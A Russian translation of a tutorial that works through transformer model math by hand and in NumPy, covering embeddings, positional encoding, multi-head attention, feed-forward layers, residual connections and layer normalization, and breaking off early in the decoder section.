Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9469 / Markets: 114759
Market Cap: $ 3 649 413 147 676 / 24h Vol: $ 111 462 614 249 / BTC Dominance: 58.888008521454%

Н Новости

[Перевод] Как работают трансформеры: разбираем математику

fc1a4c81f273b8ed87c1861e5aa8c210.png

В этом посте я представлю подробный пример математики, используемой внутри модели трансформера, чтобы вы получили хорошее представление о работе модели. Чтобы пост был понятным, я многое упрощу. Мы будем выполнять довольно много вычислений вручную, поэтому снизим размерность модели. Например, вместо эмбеддингов из 512 значений мы используем эмбеддинги из 4 значений. Это позволит упростить понимание вычислений. Мы используем произвольные векторы и матрицы, но при желании вы можете выбрать собственные значения.

Как вы увидите, математика модели не так уж сложна. Сложность возникает из-за количества этапов и количества параметров. Перед прочтением этой статьи я рекомендую прочитать пост Illustrated Transformer (или читать их параллельно) [перевод на Хабре]. Это отличный пост, объясняющий модель трансформера интуитивным (и наглядным!) образом, поэтому я не буду объяснять то, что уже объяснено в нём. Моя цель заключается в том, чтобы объяснить, как работает модель трансформера, а не что это такое. Если вы хотите углубиться в подробности, то изучите известную статью Attention is all you need [перевод на Хабре: первая и вторая части].

Обязательные требования

Для понимания статьи необходимы базовые знания линейной алгебры; в основном мы будем выполнять простые матричные умножения, так что специалистом быть необязательно. Кроме того, будут полезны знания основ машинного обучения и глубокого обучения.

Что рассматривается в статье?

  • Полный пример математических вычислений, происходящих в модели трансформера в процессе инференса

  • Объяснение механизмов внимания

  • Объяснение остаточных связей и нормализации слоёв

  • Код для масштабирования модели

Наша цель будет заключаться в использовании модели трансформера в качестве инструмента для перевода, чтобы мы могли передать модели входные данные и ожидать от неё генерации перевода. Например, мы можем передать «Hello World» на английском и ожидать на выходе получить «Hola Mundo» на испанском.

Давайте взглянем на пугающую диаграмму трансформера (не бойтесь, скоро вы её поймёте!):

Модель трансформера из статьи «Attention is all you need»
Модель трансформера из статьи «Attention is all you need»

Исходная модель трансформера состоит из двух частей: кодировщика (encoder) и декодера (decoder). Кодировщик занимается «пониманием» или «осознанием смысла» входного текста, а декодер выполняет генерацию выходного текста. Давайте рассмотрим кодировщик.

Кодировщик

Цель работы кодировщика заключается в генерации обогащённого эмбеддингами описания входного текста. Этот эмбеддинг отражает семантическую информацию о входном тексте и передаётся декодеру для генерации выходного текста. Кодировщик состоит из стека из N слоёв. Прежде чем переходить к слоям, нужно разобраться, как передавать слова (или токены) в модель.

Примечание

Термин «эмбеддинг» используется слишком часто. Сначала мы создадим эмбеддинг, который будет входными данными для кодировщика. Кодировщик тоже создаёт на выходе эмбеддинг (иногда называемый hidden states). Декодер тоже получает эмбеддинг! Весь смысл в том, что эмбеддинг описывает токен в виде вектора.

0. Токенизация

Модели машинного обучения могут обрабатывать числа, а не текст, так что нам нужно превратить входной текст в числа. Именно это и выполняет токенизация! Это процесс разбиения входного текста на токены, с каждым из которых связан ID. Например, мы можем разделить текст «Hello World» на два токена: «Hello» и «World». Также мы можем разбить его на символы: «H», «e», «l», «l», «o», « »,«W», «o», «r», «l», «d». Мы сами можем выбирать принцип токенизации, он зависит от данных, с которыми мы работаем.

Для токенизации по словам (разбиения текста на слова) требуется очень большой словарь (всех возможных токенов). В нём слова наподобие «dog» и «dogs» или «run» и «running» будут разными токенами. Словарь символов потребует меньшего объёма, но будет обладать меньшим смыслом (он может быть полезен в языках наподобие китайского, где каждый символ содержит больше информации).

Прогресс двинулся в сторону токенизации по подсловам. Это нечто среднее между токенизацией по словам и по символам. Мы разделяем слова на подслова. Например, слово «tokenization» можно разбить на «token» и «ization». Как принимается решение о месте разбиения слов? Это часть обучения токенизатора при помощи статистического процесса, задача которого заключается в выявлении подслов, которые лучше всего выбрать для конкретного датасета. Это детерминированный процесс (в отличие от обучения модели машинного обучения).

В этой статье я для простоты использую токенизацию по словам. Наша цель будет заключаться в переводе «Hello World» с английского на испанский. Пример «Hello World» мы разобьём на токены «Hello» и «World». Каждому токену присваивается в словаре модели ID. Например, «Hello» может быть токеном 1, а «World» — токеном 2.

1. Эмбеддинг текста

Хотя мы можем передать модели ID токенов (то есть 1 и 2), эти числа не несут никакого смысла. Нужно превратить их в векторы (список чисел). Именно это и выполняет процесс эмбеддинга! Эмбеддинги токена сопоставляют ID токена с вектором фиксированной длины, имеющим семантическое значение токенов. Это создаёт интересные свойства: схожие токены будут иметь схожий эмбеддинг (иными словами, вычисление косинусного коэффициента между двумя эмбеддингами даст нам хорошее понимание степени схожести токенов).

Стоит заметить, что отображение токена в эмбеддинг изучается моделью. Хотя мы можем использовать уже обученный эмбеддинг наподобие word2vec или GloVe, в процессе своего обучения модели трансформеров изучают эти эмбеддинги. Это большое преимущество, поскольку модель может изучить наилучшее описание токенов для поставленной перед ней задачи. Например, модель может научиться тому, что «dog» и «dogs» должны иметь схожие эмбеддинги.

Все эмбеддинги в одной модели имеют одинаковый размер. В трансформере из научной статьи использовался размер 512, но чтобы мы могли выполнять вычисления, снизим его размер до 4. Я назначу каждому токену случайные значения (как говорилось выше, это отображение обычно изучается моделью).

Hello -> [1,2,3,4]

World -> [2,3,4,5]

Примечание

После публикации статьи многие читатели задали вопросы о представленных выше эмбеддингах. Мне было лениво и я просто записал числа, с которыми будет удобно выполнять вычисления. На практике эти числа будут изучаться моделью. Чтобы это было понятнее, я дополнил пост.

Мы можем вычислить схожесть этих векторов при помощи косинусного коэффициента, который для представленных выше векторов будет слишком высоким. На практике вектор, скорее всего, будет выглядеть примерно так: [-0.071, 0.344, -0.12, 0.026, …, -0.008].

Мы можем представить наши входные данные в виде единой матрицы

21ac942d73e513a75f7e6435f4827fca.png

Примечание

Хотя мы и можем обрабатывать два эмбеддинга как два отдельных вектора, проще работать с ними как с единой матрицей, потому что в дальнейшем мы будем выполнять умножение матриц.

2. Позиционное кодирование

Отдельные эмбеддинги в матрице не содержат информации о позиции слов в предложении, так что нам нужна информация о позиции. Её можно создать, добавив к эмбеддингу позиционное кодирование.

Получить его можно различными способами; мы можем использовать изученный эмбеддинг или фиксированный вектор. В исходной научной статье используется фиксированный вектор, потому что авторы не увидели почти никакой разницы между двумя методиками (см. раздел 3.5 статьи). Мы тоже воспользуемся фиксированным вектором. Функции синуса и косинуса имеют волнообразный паттерн и повторяются. Благодаря использованию этих функций каждая позиция в предложении получает уникальное, но согласованное позиционное кодирование. Их повторяемость поможет модели проще изучать паттерны наподобие близости и расстояния между элементами. В статье используются следующие функции:

07739ac8ce5c811f974ff3d5150159cc.png

Смысл заключается в интерполяции между синусом и косинусом для каждого значения в эмбеддинге (для чётных индексов используется синус, для нечётных используется косинус). Давайте вычислим их для нашего примера!

Для «Hello»

  • i = 0 (чётный): PE(0,0) = sin(0 / 10000^(0 / 4)) = sin(0) = 0

  • i = 1 (нечётный): PE(0,1) = cos(0 / 10000^(2*1 / 4)) = cos(0) = 1

  • i = 2 (чётный): PE(0,2) = sin(0 / 10000^(2*2 / 4)) = sin(0) = 0

  • i = 3 (нечётный): PE(0,3) = cos(0 / 10000^(2*3 / 4)) = cos(0) = 1

Для «World»

  • i = 0 (чётный): PE(1,0) = sin(1 / 10000^(0 / 4)) = sin(1 / 10000^0) = sin(1) ≈ 0.84

  • i = 1 (нечётный): PE(1,1) = cos(1 / 10000^(2*1 / 4)) = cos(1 / 10000^0.5) ≈ cos(0.01) ≈ 0.99

  • i = 2 (чётный): PE(1,2) = sin(1 / 10000^(2*2 / 4)) = sin(1 / 10000^1) ≈ 0

  • i = 3 (нечётный): PE(1,3) = cos(1 / 10000^(2*3 / 4)) = cos(1 / 10000^1.5) ≈ 1

В итоге получаем следующее:

  • «Hello» -> [0, 1, 0, 1]

  • «World» -> [0.84, 0.99, 0, 1]

Обратите внимание, что эти кодировки имеют ту же размерность, что и исходный эмбеддинг.

Примечание

Мы используем синус и косинус, как и в исходной научной статье, но есть и другие способы реализации. В очень популярном трансформере BERT применяются обучаемые позиционные эмбеддинги.

3. Добавляем позиционное кодирование и эмбеддинг

Теперь мы добавим к эмбеддингу позиционное кодирование. Это выполняется сложением двух векторов.

«Hello» = [1,2,3,4] + [0, 1, 0, 1] = [1, 3, 3, 5]

«World» = [2,3,4,5] + [0.84, 0.99, 0, 1] = [2.84, 3.99, 4, 6]

То есть наша новая матрица, которая будет входными данными для кодировщика, выглядит так:

b3c1f5027a551dfb3e3e73cc91d26fa3.png

Если посмотреть на изображение из научной статьи, то можно увидеть, что мы только что выполнили левую нижнюю часть изображения (эмбеддинг + позиционное кодирование).

Модель трансформера из статьи «Attention is all you need»
Модель трансформера из статьи «Attention is all you need»

4. Самовнимание

4.1 Определение матриц

Теперь мы введём концепцию многоголового внимания (multi-head attention). Внимание — это механизм, позволяющий модели сосредоточиться на определённых частях входных данных. Многоголовое внимание позволяет модели совместно уделять внимание информации из различных подпространств описаний. Для этого используются множественные головы внимания. Каждая голова внимания имеет собственные матрицы K, V и Q.

Давайте в нашем примере используем две головы внимания. Для этих матриц мы применим случайные значения. Каждая матрица будет иметь размер 4x3. Благодаря этому каждая матрица будет преобразовывать четырёхмерные эмбеддинги в трёхмерные ключи (K), значения (V) и запросы (Q). Это снижает размерность механизма внимания, что помогает управлять вычислительной сложностью. Стоит отметить, что использование слишком малого размера внимания уменьшит точность модели. Давайте используем следующие значения (выбраны произвольно):

Для первой головы

6d6536a6f378872e5551e5ae957dbdf9.png

Для второй головы

ae855c0cdc319b6b83cbfe04f7b10b73.png

4.2 Вычисление ключей, запросов и значений

Для получения ключей, запросов и значений нужно умножить входные эмбеддинги на матрицы весов.

Вычисление ключей

b022aa1304298a0573f65941cb2d6acf.png

На самом деле, нам не нужно вычислять всё это вручную, это будет слишком монотонно. Давайте схитрим и воспользуемся NumPy.

Сначала определим матрицы

import numpy as np

WK1 = np.array([[1, 0, 1], [0, 1, 0], [1, 0, 1], [0, 1, 0]])
WV1 = np.array([[0, 1, 1], [1, 0, 0], [1, 0, 1], [0, 1, 0]])
WQ1 = np.array([[0, 0, 0], [1, 1, 0], [0, 0, 1], [1, 0, 0]])

WK2 = np.array([[0, 1, 1], [1, 0, 1], [1, 1, 0], [0, 1, 0]])
WV2 = np.array([[1, 0, 0], [0, 1, 1], [0, 0, 1], [1, 0, 0]])
WQ2 = np.array([[1, 0, 1], [0, 1, 0], [1, 0, 0], [0, 1, 1]])

И убедимся, что в приведённых выше вычислениях нет никаких ошибок.

embedding = np.array([[1, 3, 3, 5], [2.84, 3.99, 4, 6]])
K1 = embedding @ WK1
K1
array([[4.  , 8.  , 4.  ],
       [6.84, 9.99, 6.84]])

Отлично! Теперь давайте получим значения и запросы

Вычисление значений

V1 = embedding @ WV1
V1
array([[6.  , 6.  , 4.  ],
       [7.99, 8.84, 6.84]])

Вычисление запросов

Q1 = embedding @ WQ1
Q1
array([[8.  , 3.  , 3.  ],
       [9.99, 3.99, 4.  ]])

Давайте пока пропустим вторую голову и сосредоточимся на окончательном результате первой головы. Ко второй голове мы вернёмся позже.

4.3 Вычисление внимания

Для вычисления показателя внимания требуется пара шагов:

  1. Вычисление скалярного произведения запроса и каждого ключа

  2. Деление результата на квадратный корень размерности вектора ключа

  3. Применение функции softmax для получения весов внимания

  4. Умножение каждого вектора значения на веса внимания

4.3.1 Скалярное произведение запроса и каждого ключа

Для вычисления результата для «Hello» необходимо вычислить скалярное произведение q1 и каждого вектора ключа (k1 и k2)

9d2504e2828fd8ea6d6c94e98d42be9a.png

В мире матриц это будет равно Q1, умноженному на перестановку K1

6e4a5525d96bde952b7b76024dc842d5.png

Я могу сделать ошибку, так что давайте проверим всё это ещё раз с помощью Python

scores1 = Q1 @ K1.T
scores1
array([[ 68.    , 105.21  ],
       [ 87.88  , 135.5517]])

4.3.2 Деление на квадратный корень размерности вектора ключа

Затем мы делим показатели на квадратный корень размерности (d) ключей (в данном случае это 3, но в научной статье она была равна 64). Почему? При больших значениях d скалярное произведение растёт слишком быстро (ведь мы складываем умножение кучи чисел, что приводит к большим значениям). А большие значения — это плохо! Подробнее мы поговорим об этом чуть позже.

scores1 = scores1 / np.sqrt(3)
scores1
array([[39.2598183 , 60.74302182],
       [50.73754166, 78.26081048]])

4.3.3 Применение функции softmax

Далее используем softmax для нормализации, чтобы все они были положительны и в сумме равнялись 1.

Что такое softmax?

Softmax — это функция, получающая вектор значений и возвращающая вектор значений между 0 и 1, в котором сумма значений равна 1. Это удобный способ получения вероятностей. Функция определяется следующим образом:

e7a48588f466c4234929d03def3500f0.png

Не пугайтесь этой формулы, на самом деле она довольно проста. Допустим, у нас есть следующий вектор:

c750d84109caee4305daf1dfafe58f80.png

Softmax этого вектора будет такой:

c6c21d57fe4f33b902add6e0b6bed43f.png

Как видите, все значения положительны и в сумме дают 1.

def softmax(x):
    return np.exp(x) / np.sum(np.exp(x), axis=1, keepdims=True)


scores1 = softmax(scores1)
scores1
array([[4.67695573e-10, 1.00000000e+00],
       [1.11377182e-12, 1.00000000e+00]])

4.3.4 Умножение матрицы значений на веса внимания

Далее мы умножаем на матрицу значений

attention1 = scores1 @ V1
attention1
array([[7.99, 8.84, 6.84],
       [7.99, 8.84, 6.84]])

Давайте объединим 4.3.1, 4.3.2, 4.3.3 и 4.3.4 в одну формулу с использованием матриц (это из раздела 3.2.1 научной статьи):

a02751d90c6c85873ce9b30671a9496a.png

Да, вот и всё! Все проделанные нами вычисления можно легко свести к показанной выше формуле внимания! Давайте перенесём это в код.

def attention(x, WQ, WK, WV):
    K = x @ WK
    V = x @ WV
    Q = x @ WQ

    scores = Q @ K.T
    scores = scores / np.sqrt(3)
    scores = softmax(scores)
    scores = scores @ V
    return scores
attention(embedding, WQ1, WK1, WV1)
array([[7.99, 8.84, 6.84],
       [7.99, 8.84, 6.84]])

Мы убедились, что значения те же, что и получены выше. Давайте воспользуемся этим кодом для получения показателей внимания второй головы внимания:

attention2 = attention(embedding, WQ2, WK2, WV2)
attention2
array([[8.84, 3.99, 7.99],
       [8.84, 3.99, 7.99]])

Если вас интересует, как внимание стало одинаковым для двух эмбеддингов, то это вызвано тем, что softmax переводит показатели в 0 и 1. Смотрите:

softmax(((embedding @ WQ2) @ (embedding @ WK2).T) / np.sqrt(3))
array([[1.10613872e-14, 1.00000000e+00],
       [4.95934510e-20, 1.00000000e+00]])

Это вызвано плохой инициализацией матриц и маленьким размерам векторов. Большие различиях в показателях до применения softmax будут лишь усилены, приводя к том, что одно значение будет близко к 1, а другие к 0. На практике наши исходные значения матрицы эмбеддингов были слишком велики, что привело к высоким значениям для ключей, значений и запросов, которые при умножении становились только выше.

Помните, как мы выполняли деление на квадратный корень размерности ключей? Именно поэтому мы это и делали, в противном случае значения скалярного произведения были бы слишком большими, из-за чего получились бы большие значения после softmax. Однако в данном случае, похоже, этого не было достаточно, учитывая наши небольшие значения! В качестве быстрого хака мы можем уменьшить масштаб значений на меньшее значение, чем квадратный корень трёх. Давайте переопределим функцию внимания, уменьшив масштаб на 30. В долгой перспективе это плохое решение, но оно поможет нам получить разные значения для показателей внимания. Позже мы вернёмся к более качественному решению.

def attention(x, WQ, WK, WV):
    K = x @ WK
    V = x @ WV
    Q = x @ WQ

    scores = Q @ K.T
    scores = scores / 30  # we just changed this
    scores = softmax(scores)
    scores = scores @ V
    return scores
attention1 = attention(embedding, WQ1, WK1, WV1)
attention1
array([[7.54348784, 8.20276657, 6.20276657],
       [7.65266185, 8.35857269, 6.35857269]])
attention2 = attention(embedding, WQ2, WK2, WV2)
attention2
array([[8.45589591, 3.85610456, 7.72085664],
       [8.63740591, 3.91937741, 7.84804146]])

4.3.5 Выходные значения внимания голов

Следующий слой кодировщика ожидает на входе одну матрицу, а не две. Первым этапом будет конкатенация выходных значений двух голов (см. раздел 3.2.2 научной статьи)

attentions = np.concatenate([attention1, attention2], axis=1)
attentions
array([[7.54348784, 8.20276657, 6.20276657, 8.45589591, 3.85610456,
        7.72085664],
       [7.65266185, 8.35857269, 6.35857269, 8.63740591, 3.91937741,
        7.84804146]])

Затем мы умножаем эту конкатенированную матрицу на матрицу весов, чтобы получить окончательный результат слоя внимания. Этой матрице весов модель тоже обучается! Размерность матрицы гарантирует, что мы вернёмся к той же размерности, что была у эмбеддинга (в нашем случае 4).

# Просто произвольные значения
W = np.array(
    [
        [0.79445237, 0.1081456, 0.27411536, 0.78394531],
        [0.29081936, -0.36187258, -0.32312791, -0.48530339],
        [-0.36702934, -0.76471963, -0.88058366, -1.73713022],
        [-0.02305587, -0.64315981, -0.68306653, -1.25393866],
        [0.29077448, -0.04121674, 0.01509932, 0.13149906],
        [0.57451867, -0.08895355, 0.02190485, 0.24535932],
    ]
)
Z = attentions @ W
Z
array([[ 11.46394285, -13.18016471, -11.59340253, -17.04387829],
       [ 11.62608573, -13.47454936, -11.87126395, -17.4926367 ]])

Всё это можно объединить в изображение из The Ilustrated Transformer

Attention
Attention

5. Слой с прямой связью

5.1 Простой слой с прямой связью

После слоя самовнимания у кодировщика идёт нейронная сеть с прямой связью (feed-forward neural network, FFN). Это простая сеть с двумя линейными преобразованиями и активацией ReLU между ними. В посте The Illustrated Transformer подробностей об этом нет, так что я вкратце объясню этот слой. Цель FFN заключается в обработке и трансформировании описания, созданного механизмом внимания. Поток обычно выглядит так (см. раздел 3.3 научной статьи):

  1. Первый линейный слой: обычно он расширяет размерность входных данных. Например, если размерность входных данных равна 512, то размерность выходных данных может быть равна 2048. Это выполняется для того, чтобы позволить модели изучать более сложные функции. В нашем простом примере с размерностью 4 мы расширимся до 8.

  2. Активация ReLU: нелинейная функция активации. Это простая функция, возвращающая 0, если входные данные отрицательны, и входные данные, если они положительны. Это позволяет модели обучаться нелинейным функциям. Вычисления выглядят так:

262eac2557430f65416a724b1505a335.png
  1. Второй линейный слой: он противоположен первому линейному слою. Этот слой снова возвращает размерность к исходной. В нашем примере он выполнит снижение с 8 до 4.

Всё это можно описать следующим образом

bbc6f12f046194f7a985ee22eeb560c8.png

Напомню, что входными данными для этого слоя является Z, которое мы вычислили в самовнимании. Вот какие значения мы там получили

98bd6018fe81f8a9ce807877020cc5d8.png

Теперь давайте зададим произвольные значения для матриц весов и векторов смещений. Я сделаю это в коде, но если у вас хватит терпения, то можете задать их вручную!

W1 = np.random.randn(4, 8)
W2 = np.random.randn(8, 4)
b1 = np.random.randn(8)
b2 = np.random.randn(4)

А теперь давайте запишем функцию прямого прохода

def relu(x):
    return np.maximum(0, x)

def feed_forward(Z, W1, b1, W2, b2):
    return relu(Z.dot(W1) + b1).dot(W2) + b2
output_encoder = feed_forward(Z, W1, b1, W2, b2)
output_encoder
array([[ -3.24115016,  -9.7901049 , -29.42555675, -19.93135286],
       [ -3.40199463,  -9.87245924, -30.05715408, -20.05271018]])

5.2 Объединяем всё: произвольный кодировщик

Теперь давайте напишем код, чтобы объединить в блоке кодировщика многоголовое внимание и прямую связь.

Примечание

Код оптимизирован для понимания и образовательных целей, а не для производительности, не судите слишком строго!

d_embedding = 4
d_key = d_value = d_query = 3
d_feed_forward = 8
n_attention_heads = 2

def attention(x, WQ, WK, WV):
    K = x @ WK
    V = x @ WV
    Q = x @ WQ

    scores = Q @ K.T
    scores = scores / np.sqrt(d_key)
    scores = softmax(scores)
    scores = scores @ V
    return scores

def multi_head_attention(x, WQs, WKs, WVs):
    attentions = np.concatenate(
        [attention(x, WQ, WK, WV) for WQ, WK, WV in zip(WQs, WKs, WVs)], axis=1
    )
    W = np.random.randn(n_attention_heads * d_value, d_embedding)
    return attentions @ W

def feed_forward(Z, W1, b1, W2, b2):
    return relu(Z.dot(W1) + b1).dot(W2) + b2

def encoder_block(x, WQs, WKs, WVs, W1, b1, W2, b2):
    Z = multi_head_attention(x, WQs, WKs, WVs)
    Z = feed_forward(Z, W1, b1, W2, b2)
    return Z

def random_encoder_block(x):
    WQs = [
        np.random.randn(d_embedding, d_query) for _ in range(n_attention_heads)
    ]
    WKs = [
        np.random.randn(d_embedding, d_key) for _ in range(n_attention_heads)
    ]
    WVs = [
        np.random.randn(d_embedding, d_value) for _ in range(n_attention_heads)
    ]
    W1 = np.random.randn(d_embedding, d_feed_forward)
    b1 = np.random.randn(d_feed_forward)
    W2 = np.random.randn(d_feed_forward, d_embedding)
    b2 = np.random.randn(d_embedding)
    return encoder_block(x, WQs, WKs, WVs, W1, b1, W2, b2)

Вспомним наши входные данные в матрице E, имеющие позиционное кодирование и эмбеддинг.

embedding
array([[1.  , 3.  , 3.  , 5.  ],
       [2.84, 3.99, 4.  , 6.  ]])

Теперь передадим это нашей функции random_encoder_block

random_encoder_block(embedding)
array([[ -71.76537515, -131.43316885,   13.2938131 ,   -4.26831998],
       [ -72.04253781, -131.84091347,   13.3385937 ,   -4.32872015]])

Отлично! Это был всего один блок кодировщика. В научной статье применяются шесть кодировщиков. Выходные данные одного кодировщика передаются на следующий и так далее:

def encoder(x, n=6):
    for _ in range(n):
        x = random_encoder_block(x)
    return x


encoder(embedding)
/tmp/ipykernel_11906/1045810361.py:2: RuntimeWarning: overflow encountered in exp
  return np.exp(x)/np.sum(np.exp(x),axis=1, keepdims=True)
/tmp/ipykernel_11906/1045810361.py:2: RuntimeWarning: invalid value encountered in divide
  return np.exp(x)/np.sum(np.exp(x),axis=1, keepdims=True)
array([[nan, nan, nan, nan],
       [nan, nan, nan, nan]])

5.3 Остаточные связи и нормализация слоёв

Ой-ёй! У нас начали появляться NaN! Похоже, наши значения слишком велики и при передаче следующему кодировщику они оказываются слишком большими и «взрываются»! Эта проблема слишком больших значений часто возникает при обучении моделей. Например, когда мы выполняем обратное распространение ошибки (методику, при помощи которой модели обучаются), градиенты могут оказаться слишком большими и в результате «взрываются»; это называется взрывом градиентов (gradient explosion). Без нормализации небольшие изменения во входных данных на первых слоях в последующих слоях усиливаются. Это распространённая проблема в глубоких нейросетях. Существует два способа борьбы с этой проблемой: остаточные связи и нормализация слоёв (они вкратце упоминаются в разделе 3.1 научной статьи).

  • Остаточные связи просто прибавляют входные данные слоя к его выходным данным. Например, мы складываем исходный эмбеддинг с выходными данными внимания. Остаточные связи устраняют проблему исчезающих градиентов. Логика в том, что если градиент слишком мал, то мы можем просто сложить входные данные к выходным, и градиент станет больше. Вычисления очень просты:

f57ea26cb87a7dc176fe66b656dc2bbb.png

Вот и всё! Мы сделаем это для выходных данных внимания и выходных данных слоя с прямой связью.

  • Нормализация слоя — это методика нормализации входных данных слоя. Она выполняет нормализацию по размерности эмбеддинга. Логика в том, что мы хотим нормализовать входные значения слоя, чтобы они имели среднее значение 0 и квадратическое отклонение 1. Это помогает с градиентным потоком. Вычисления на первый взгляд выглядят не так уж просто.

e86b11dab9af842f994c4919c2e5d7ab.png

Давайте объясним каждый параметр:

  • μ — это среднее значение эмбеддинга

  • σ — это квадратическое отклонение эмбеддинга

  • ε — это малое число, чтобы избежать деления на ноль. В случае нулевого значения квадратичного отклонения этот маленький эпсилон спасает нас.

  • γ и β — это изучаемые параметры, управляющие этапами масштабирования и сдвига.

В отличие от пакетной нормализации (batch normalization, не волнуйтесь, если не знаете, что это такое), нормализация слоёв нормализует по размерности эмбеддинга; это означает, что на каждый эмбеддинг не будут влиять другие сэмплы в пакете. Идея заключается в том, что мы хотим нормализовать входные данные слоя, чтобы они имели среднее значение 0 и квадратичное отклонение 1.

Зачем мы добавляем изучаемые параметры γ и β? Причина в том, что мы не хотим терять силу представления слоя. Если просто нормализовать входные данные, то какая-то информация может потеряться. Добавляя изучаемые параметры, мы можем научиться масштабировать и сдвигать нормализованные значения.

Соединив эти уравнения, мы получим уравнение для всего кодировщика:

a0ac41a886c0c090a94831b723273008.png

Давайте проверим его на нашем примере! Возьмём прежние значения E и Z:

93bf47f27dedfcf295a42d2a389532c0.png

Теперь давайте вычислим нормализацию слоя; можно разделить этот процесс на три этапа:

  1. Вычисление среднего и дисперсии для каждого эмбеддинга.

  2. Нормализация вычитанием среднего в своей строке и делением на квадратный корень дисперсии строки (плюс малое число, чтобы избежать деления на ноль).

  3. Масштабирование и сдвиг умножением на гамму и прибавлением беты.

5.3.1 Среднее и дисперсия

Для первого эмбеддинга

7612e4d1500e7da378314073941be8ec.png

То же самое можно сделать для второго эмбеддинга. Пропустим сами вычисления и покажем только результат.

18f35a79565b79570fe341e8b6d85172.png

Давайте проверим при помощи Python

(embedding + Z).mean(axis=-1, keepdims=True)
array([[-4.58837567],
       [-3.59559107]])
(embedding + Z).std(axis=-1, keepdims=True)
array([[ 9.92061529],
       [10.50653019]])

Отлично! Теперь нормализуем

5.3.2 Нормализация

При нормализации из каждого значения в эмбеддинге мы вычитаем среднее и делим его на квадратичное отклонение. Эпсилон — это очень маленькое значение, например, 0,00001. Чтобы упростить, будем считать, что γ = 1, а β = 0.

ffe25dfe71f08897906a58c82bd44a0f.png

Для второго эмбеддинга мы не будем выполнять вычисления вручную. Проверим их при помощи кода. Переопределим функцию encoder_block, внеся следующее изменение:

def layer_norm(x, epsilon=1e-6):
    mean = x.mean(axis=-1, keepdims=True)
    std = x.std(axis=-1, keepdims=True)
    return (x - mean) / (std + epsilon)

def encoder_block(x, WQs, WKs, WVs, W1, b1, W2, b2):
    Z = multi_head_attention(x, WQs, WKs, WVs)
    Z = layer_norm(Z + x)

    output = feed_forward(Z, W1, b1, W2, b2)
    return layer_norm(output + Z)
layer_norm(Z + embedding)
array([[ 1.71887693, -0.56365339, -0.40370747, -0.75151608],
       [ 1.71909039, -0.56050453, -0.40695381, -0.75163205]])

Сработало! Давайте ещё раз попробуем пропустить эмбеддинг через шесть кодировщиков.

def encoder(x, n=6):
    for _ in range(n):
        x = random_encoder_block(x)
    return x


encoder(embedding)
array([[-0.335849  , -1.44504571,  1.21698183,  0.56391289],
       [-0.33583947, -1.44504861,  1.21698606,  0.56390202]])

Отлично! Значения приемлемые и отсутствуют NaN! Идея стека кодировщиков заключается в том, что на выходе они выдают непрерывное описание z, передающее смысл входной последовательности. Затем это описание передаётся декодеру, который генерирует выходную последовательность символов по одному элементу за раз.

Прежде чем приступать к декодеру, взглянем на изображение из потрясающего поста Джея:

Кодировщик и декодер
Кодировщик и декодер

Каждый из элементов в левой части должен быть вам уже понятен! Впечатляет, правда? А теперь давайте перейдём к декодеру.

Декодер

Большинство знаний, полученных при изучении кодировщиков, будет использоваться и в декодере! Декодер имеет два слоя самовнимания, один для кодировщика, другой для декодера. Также декодер имеет слой с прямой связью. Давайте разберём каждую из частей по порядку.

Блок декодера получает два элемента входных данных: выходные данные кодировщика и сгенерированную выходную последовательность. Выходные данные кодировщика — это описание входной последовательности. В процессе инференса сгенерированная выходная последовательность начинается с особого токена начала последовательности (start-of-sequence token, SOS). Во время обучения целевая выходная последовательность — это действительная выходная последовательность, сдвинутая на одну позицию. Скоро это станет вам понятнее!

Имея сгенерированный кодировщиком эмбеддинг и токен SOS, декодер генерирует следующий токен последовательности, то есть «hola». Декодер авторегрессивен, то есть он берёт ранее сгенерированные токены и снова генерирует второй токен.

  • Итерация 1: входные данные — SOS, выходные — «hola»

  • Итерация 2: входные данные — SOS + «hola», выходные — «mundo»

  • Итерация 3: входные данные — SOS + «hola» + «mundo», выходные — EOS

Здесь SOS — это токен начала последовательности, а EOS — токен конца последовательности. После генерации токена EOS декодер прекращает работу. Он генерирует по одному токену за раз. Обратите внимание, что во всех итерациях используется эмбеддинг, сгенерированный кодировщиком.

Примечание

Такая авторегрессивная структура замедляет работу декодера. Кодировщик способен генерировать свой эмбеддинг за один прямой проход, а декодеру необходимо выполнить множество прямых проходов. Это одна из причин, по которым архитектуры, использующие один кодировщик (например, BERT или модели схожести предложений) гораздо быстрее, чем архитектуры с одними только декодерами (например, GPT-2 или BART).

Давайте разберём каждый из этапов! Как и кодировщик, декодер состоит из стека блоков декодеров. Блок декодера чуть сложнее, чем блок кодировщика. Его общая структура такова:

  1. Слой самовнимания (маскированный)

  2. Остаточная связь и нормализация слоя

  3. Слой внимания кодировщика-декодера

  4. Остаточная связь и нормализация слоя

  5. Слой с прямой связью

  6. Остаточная связь и нормализация слоя

Мы уже знакомы со всей математикой пунктов 1, 2, 3, 5 и 6. Взглянув на правую часть изображения ниже, вы увидите, что все эти блоки вам уже известны :

Модель трансформера из статьи «Attention is all you need»
Модель трансформера из статьи «Attention is all you need»

1. Эмбеддинг текста

Первый текст декодера нужен для эмбеддинга входных токенов. Входным токеном является SOS, так что мы выполняем его эмбеддинг. Используется та же размерность эмбеддинга, что и для кодировщика. Предположим, вектор эмбеддинга для SOS имеет такой вид:

35f571ab480469598afaf2272b2ac2ea.png

2. Позиционное кодирование

Теперь мы добавим в эмбеддинг позиционное кодирование, как делали это в случае с кодировщиком. Учитывая, что это так же позиция, что и у «Hello», у нас будет то же позиционное кодирование, что и раньше:

  • i = 0 (чётный): PE(0,0) = sin(0 / 10000^(0 / 4)) = sin(0) = 0

  • i = 1 (нечётный): PE(0,1) = cos(0 / 10000^(2*1 / 4)) = cos(0) = 1

  • i = 2 (чётный): PE(0,2) = sin(0 / 10000^(2*2 / 4)) = sin(0) = 0

  • i = 3 (нечётный): PE(0,3) = cos(0 / 10000^(2*3 / 4)) = cos(0) = 1

3. Сложение позиционного кодирования и эмбеддинга

Сложение позиционного кодирования с эмбеддингом выполняется сложением двух векторов:

94c8d59a4656853cd52979ac450b716b.png

4. Самовнимание

Первый этап в блоке декодера — это механизм самовнимания. К счастью, у нас есть для этого код и мы можем просто его использовать!

d_embedding = 4
n_attention_heads = 2

E = np.array([[1, 1, 0, 1]])
WQs = [np.random.randn(d_embedding, d_query) for _ in range(n_attention_heads)]
WKs = [np.random.randn(d_embedding, d_key) for _ in range(n_attention_heads)]
WVs = [np.random.randn(d_embedding, d_value) for _ in range(n_attention_heads)]

